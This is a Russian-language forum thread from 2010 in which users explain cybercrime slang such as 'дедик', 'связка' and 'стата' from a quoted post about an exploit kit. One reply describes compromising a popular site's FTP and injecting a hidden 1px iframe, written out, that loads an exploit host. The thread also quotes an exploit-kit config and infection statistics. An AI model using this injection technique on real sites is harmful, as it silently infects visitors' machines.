Объясните профану обо что это тут описанно?

Тема в разделе "WASM.HEAP", создана пользователем _sheva740, 18 авг 2010.

  1. _sheva740

    _sheva740 New Member

    Публикаций:
    0
    Регистрация:
    31 авг 2005
    Сообщения:
    1.539
    Адрес:
    Poland
    Что-то искал как-то и вот наткнулся на одном форуме,
    и заметил что совсем не понимаю о чем он спрашивает :dntknw:
    Текст его вопроса:

    Что за процесс тут описан,
    Что такое:
    - дедик
    - купил трафф на связку
    - по стате заражаются

    Чем этот чел занят?
    Где об этом почитать, чтоб хоть в терминах разобраться?
     
  2. 7mm

    7mm New Member

    Публикаций:
    0
    Регистрация:
    15 дек 2009
    Сообщения:
    442
    "Дедик", я так понимаю, выделенный сервер (dedicated), в данном связанный с брутфорсом. "по стате заражаются" - в статистике видно, что происходят заражения, но ответов похоже нет.
     
  3. Husky_Head_2014

    Husky_Head_2014 New Member

    Публикаций:
    0
    Регистрация:
    28 фев 2010
    Сообщения:
    131
    Текст:

    Запускаю исполняемый файл на удаленных серверах которые предварительно захватил путем подбора пароля, все хорошо

    купил поток посетителей идущий на страницу с подборкой вредоносного программного обеспечения, но ни одна зараженная машина не ответила, хотя по статистике заражаются
    Unique Visits Exploited Percent
    862 101 11.72%

    в конфигурации указано
    $BANTIME = 86400;
    $COUNTRIES = array("RU" => "exe.exe", "DE" => "exe.exe", "US" => "exe.exe");

    Посетители с Соединённого Королевства Великобритании и Северной Ирландии

    Ну вот такой примерно перевод ;)

    Описан процесс заражения пользователей зашедших на ресурс с вредоносным программным обеспечением

    дедикейтед - dedicated - выделенный сервер (то есть не виртуальный, а реальная машина)

    Имеется хост со сплоитами (связкой) например supermegasploit.pnh.edu.

    Так вот каждый посетитель зашедший на этот сайт является единицей траффа.

    Т.е. 1К траффа это одна тысяча посетителей волей либо неволей зашедших на сайт со сплоитами.

    Я думаю что следующий ваш вопрос будет:"Откуда он берется? Откуда находиться такое колличество посетителей"

    Так вот тут все относительно просто.

    Например взламываем или покупаем FTP доступ к какому нибуть популярному сайту назовем его popsite.com.
    Потом вставляем в главную страницу такой код
    (надеюсь на то что вы дружите с HTML =) ) <iframe src="http://supermegasploit.pnh.edu" width=1px height=1px>, отсюда понятно что вместе с сайтом popsite.com в который мы встатавили этот код будут загружаться наши сплоиты, но это не будет видно пользователям. И что мы получаем в итоге все люди посетившие popsite.com посетили supermegasploit.pnh.edu
    сами об этом не догадываясь. То есть мы получили заветный трафф.

    Статистика или как ее чаще называют стата, это механизм подсчета.

    Стата как я уже выше писал входит в "комплект" к любой связке сплоитов.

    Так вот что же они считает...

    Стата подсчитывает общее колличество людей зашедших на страницу со сплоитами, версии их ОС, их браузеры
    (например сколько народа из общего количества использовало браузер IE) и прочее. Всё зависит от наворочености статы.

    веб-хакерством

    Что такое связка сплойтов? Что входит в состав связки? Откуда берут сплойты для связки? Как определить эффективность связки? На каком языке программирования можно написать связку? - http://forum.antichat.ru/thread58567.html

    Что такое стата (статистика) Что такое пробив. Что такое трафф (траффик) и куда его гонят - http://forum.hackersoft.ru/showthread.php?t=2756

    Хакерско-русские словари:

    http://forum.antichat.ru/thread17961.html

    http://www.exploit.in/forum/index.php?showtopic=7840

    http://www.xakep.ru/magazine/xa/049/024/1.asp

    http://www.lingvo.ru/ITcrowd/

    Типо того, будут еще вопросы можешь задать здесь: http://forum.reverse4you.org/
     
  4. karabas_barabas

    karabas_barabas Member

    Публикаций:
    0
    Регистрация:
    9 авг 2009
    Сообщения:
    168
    хм если не изменяет память я тоже видел это когда-то, кажись на экспе :) вроде чувак где-то не выставил нужные права на скрипте :)
     
  5. LMaster

    LMaster New Member

    Публикаций:
    0
    Регистрация:
    31 янв 2010
    Сообщения:
    14
    Если интересно, связка - phoenix exploit kit (http://www.malwareint.com/docs/pek-analysis-en.pdf)
     
  6. _sheva740

    _sheva740 New Member

    Публикаций:
    0
    Регистрация:
    31 авг 2005
    Сообщения:
    1.539
    Адрес:
    Poland
    Спасибо большое Вам.
    Начал ( с Вашей помощью ) в терминологии немного ориентироваться.